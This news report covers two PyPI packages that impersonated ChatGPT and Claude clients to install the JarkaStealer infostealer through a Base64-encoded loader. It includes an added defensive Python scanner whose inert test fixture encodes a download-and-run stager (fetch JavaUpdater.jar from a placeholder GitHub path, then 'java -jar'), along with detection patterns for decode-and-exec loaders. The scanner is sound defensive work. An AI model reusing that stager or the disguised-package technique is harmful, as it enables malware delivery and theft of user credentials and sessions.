Cybersecurity researchers have found two malicious packages uploaded to the Python Package Index (PyPI) repository that impersonated popular artificial intelligence (AI) models like OpenAI ChatGPT and Anthropic Claude to deliver an information stealer called JarkaStealer.
The packages, named gptplus and claudeai-eng, were uploaded by a user named "Xeroline" in November 2023, attracting 1,748 and 1,826 downloads, respectively. Both libraries are no longer available for download from PyPI.
"The malicious packages were uploaded to the repository by one author and, in fact, differed from each other only in name and description," Kaspersky said in a post.
The packages purported to offer a way to access the GPT-4 Turbo API and the Claude AI API, but harbored malicious code that initiated the deployment of the malware upon installation.
Specifically, the "__init__.py" file in these packages contained Base64-encoded data that contained code to download a Java archive file ("JavaUpdater.jar") from a GitHub repository ("github[.]com/imystorage/storage"). It also downloads the Java Runtime Environment (JRE) from a Dropbox URL if Java is not already installed on the host, before running the JAR file.
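As an added illustration of the defensive side (not code from the article or from Kaspersky): a heuristic scanner for the loader pattern just described, a package `__init__.py` that hides a Base64-encoded downloader and executes it. The indicator list and the inert fixture are assumptions constructed for this example.

```python
import base64
import re
import sys
from pathlib import Path

# Heuristic indicators drawn from the stager behaviour the article describes
# (decode Base64, fetch a JAR or JRE, run it). Assumed set, tune for your estate.
INDICATORS = ("urlretrieve", "urlopen", "requests.get", "subprocess",
              "os.system", ".jar", "java", "dropbox", "github")
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
DECODE_AND_EXEC = re.compile(r"exec\s*\(.*b64decode", re.S)


def scan_init_source(source: str) -> list[str]:
    """Return findings for one __init__.py; an empty list means nothing flagged."""
    findings = []
    if DECODE_AND_EXEC.search(source):
        findings.append("exec() applied to a base64-decoded value")
    for blob in B64_LITERAL.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not text: may be a legitimate embedded binary resource
        hits = sorted({i for i in INDICATORS if i in decoded.lower()})
        if hits:
            findings.append(f"base64 literal decodes to code referencing {hits}")
    return findings


def scan_site_packages(root: Path) -> dict[str, list[str]]:
    """Scan every __init__.py below root (e.g. a site-packages directory)."""
    results = {}
    for init in root.rglob("__init__.py"):
        found = scan_init_source(init.read_text(errors="replace"))
        if found:
            results[str(init)] = found
    return results


# Constructed, inert fixture modelled on the article's description. The scanner
# only decodes and inspects this text; nothing here is ever executed.
_FIXTURE_PAYLOAD = base64.b64encode(
    b"import subprocess, urllib.request\n"
    b"urllib.request.urlretrieve('https://github.com/EXAMPLE/storage/JavaUpdater.jar', 'JavaUpdater.jar')\n"
    b"subprocess.run(['java', '-jar', 'JavaUpdater.jar'])\n"
).decode()
SUSPICIOUS_INIT = f"import base64\nexec(base64.b64decode('{_FIXTURE_PAYLOAD}'))\n"
BENIGN_INIT = "from .client import Client\n__all__ = ['Client']\n"

if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    print(scan_site_packages(target) if target else scan_init_source(SUSPICIOUS_INIT))
```

Run it with a site-packages path as the first argument to sweep an environment; without arguments it reports on the constructed fixture.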
The JAR file is a Java-based information stealer called JarkaStealer that can steal a wide range of sensitive information, including web browser data, system data, screenshots, and session tokens from various applications like Telegram, Discord, and Steam.
In the final step, the collected information is archived, transmitted to the attacker's server, and then deleted from the victim's machine. JarkaStealer has been found to be offered under a malware-as-a-service (MaaS) model via a Telegram channel for anywhere between $20 and $50, although its source code has been leaked on GitHub.
Statistics from ClickPy show that the packages were downloaded primarily by users located in the U.S., China, India, France, Germany, and Russia as part of the year-long supply chain attack campaign.
"This discovery underscores the persistent risks of software supply chain attacks and highlights the critical need for vigilance when integrating open-source components into development processes," Kaspersky researcher Leonid Bezvershenko said.